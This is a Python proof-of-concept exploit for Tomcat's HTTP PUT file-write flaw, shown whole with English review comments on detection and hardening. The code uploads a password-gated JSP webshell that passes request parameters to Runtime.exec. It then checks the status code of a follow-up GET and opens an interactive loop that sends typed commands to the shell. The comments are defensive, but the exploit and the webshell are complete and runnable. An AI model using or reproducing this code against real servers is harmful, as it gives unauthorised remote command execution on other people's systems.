"""Tomcat HTTP PUT file-write proof of concept, as published, with review notes.

The script PUTs a JSP to a user-supplied path, decides "vulnerable" purely
from the status code of a follow-up GET, then loops forever relaying typed
commands to that JSP. Annotations below are written for whoever has to
recognise this traffic in logs or harden the server; no code is changed.
"""
import requests


def title():
    """Print the tool banner (runtime strings reproduced verbatim)."""
    print('+------------------------------------------')
    print('+ \033[34mVersion: Tomcat PUT文件写入 \033[0m')
    print('+ \033[36m(Y/N) >>> 2023年5月23日 \033[0m')
    print('+ \033[36mcmd >>> ip addr \033[0m')
    print('+------------------------------------------')


def poc_1(url,jsp):
    """PUT a JSP to ``url + jsp`` and report whether the server then serves it.

    Args:
        url: base URL typed by the operator; no scheme/format validation.
        jsp: path fragment appended unchanged to ``url``.

    Prints a Chinese verdict; returns None. Neither request sets a timeout,
    and connection errors propagate as ``requests`` exceptions.
    """
    url1 = url + jsp
    # The body is a command-execution JSP (a webshell): when request
    # parameter `pwd` equals "023" it passes parameter `i` to
    # Runtime.exec and echoes the process output inside <pre>.
    # NOTE(review): Tomcat's DefaultServlet honours PUT only when its
    # `readonly` init-param is set to false (it ships as true). For
    # detection, a PUT to a .jsp-looking path, or any request body
    # containing Runtime.getRuntime().exec, is high-signal in access,
    # proxy or WAF logs; the same string can be grepped for across
    # deployed webapp directories to find files written this way.
    body = '''<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>'''
    requests.put(url=url1, data=body)
    # The verification GET targets url1 with its final character dropped;
    # what that character is expected to be is not shown here.
    url2 = url1[:-1]
    qe = requests.get(url2)
    # Any 200 is taken as success: a catch-all page or an unrelated
    # resource at that path yields a false positive, and the response
    # body is never inspected.
    if qe.status_code == 200:
        print('漏洞存在,可执行命令')
    else:
        print('没有漏洞')


def poc_2(url):
    """Relay each line typed at the ``$`` prompt to the uploaded JSP.

    Args:
        url: the served JSP URL (``url1[:-1]`` from the caller).

    Loops until an exception occurs; returns None.
    """
    try:
        while True:
            shell = input('$')
            # Fixed `pwd` value matches the one hard-coded in the JSP body
            # above, so the two functions are coupled through that constant.
            reqw = requests.get(url+'?pwd=023&i='+shell)
            print(reqw.text)
    except:
        # Bare except: Ctrl-C, EOF on stdin and any network error all end
        # the loop silently, so failures are indistinguishable from exit.
        pass


if __name__ == '__main__':
    title()
    url = input('$请输入目标url:')
    jsp = input('$请输入要保存的jsp文件:')
    poc_1(url,jsp)
    # Recomputed here instead of being returned by poc_1; must stay in
    # step with the url2 derivation inside poc_1.
    url1 = url + jsp
    url2 = url1[:-1]
    poc_2(url2)
tomcat_put写入POC.py